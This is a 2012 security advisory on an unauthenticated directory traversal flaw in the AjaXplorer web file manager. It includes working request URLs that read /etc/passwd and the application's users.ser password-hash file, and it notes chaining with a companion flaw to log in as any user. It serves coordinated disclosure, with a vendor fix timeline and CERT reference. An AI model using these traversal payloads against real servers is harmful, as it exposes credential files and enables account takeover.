www.ExploitDevelopment.com Member Vulnerability Advisories
--------------------------------------------------------------------------
www.ExploitDevelopment.com 2012-WEB-002
--------------------------------------------------------------------------
TITLE:
AjaXplorer Version 4.0.3 and Older Web-Based File Manager Allows Unauthenticated Attackers to Download Files from the Local File System
SUMMARY AND IMPACT:
A vulnerability was found in the AjaXplorer Web-Based File Manager "Get Template" feature that allows unauthenticated attackers to retrieve files from the web server filesystem. The two URL variables that are vulnerable to directory traversal are "template_name" and "pluginName". Once the correct number of parent-directory ("..") path segments is found, an attacker will be able to read any file on the server that is readable by the Apache account. If the attacker views the Users.ser file, which contains the AjaXplorer usernames and password hashes, they can log in as any user of the application using my other reported vulnerability, 2012-WEB-001.
DETAILS:
Using Mozilla Firefox and Burp Suite Proxy with Intercept enabled, access the AjaXplorer application.
Copy down the value of the "secure_token" URL querystring variable from the intercepted request:
GET /index.php?secure_token=SecureTokenWillBeHere&get_action=get_xml_registry HTTP/1.1
Change the following URLs to include the copied "secure_token" value. URL (a) will display the /etc/passwd file when AjaXplorer is installed in /var/www/html/. URL (b) will display the AjaXplorer Users.ser file, which contains the usernames and password hashes for the AjaXplorer application.
a. http://VictimIP/content.php?secure_token=PutSecureTokenHere&get_action=get_template&template_name=etc/passwd&pluginName=../../../../../..&encode=false
b. http://VictimIP/content.php?secure_token=PutSecureTokenHere&get_action=get_template&template_name=data/plugins/auth.serial/users.ser&pluginName=..&encode=false
VULNERABLE PRODUCTS:
AjaXplorer Version 4.0.3 and Older
REFERENCES AND ADDITIONAL INFORMATION:
N/A
CREDITS:
StenoPlasma (at) ExploitDevelopment.com
TIMELINE:
Discovery: N/A
Vendor Notified: Feb 24, 2012
Vendor Fixed: Feb 24, 2012
Vendor Notified of Disclosure: Feb 24, 2012
Disclosure to CERT: Feb 24, 2012
VENDOR URL:
http://www.ajaxplorer.info
ADVISORY URL:
http://www.exploitdevelopment.com/Vulnerabilities/2012-WEB-002.html
http://www.kb.cert.org/vuls/id/504019
VENDOR ADVISORY URL:
http://ajaxplorer.info/ajaxplorer-4-0-4/
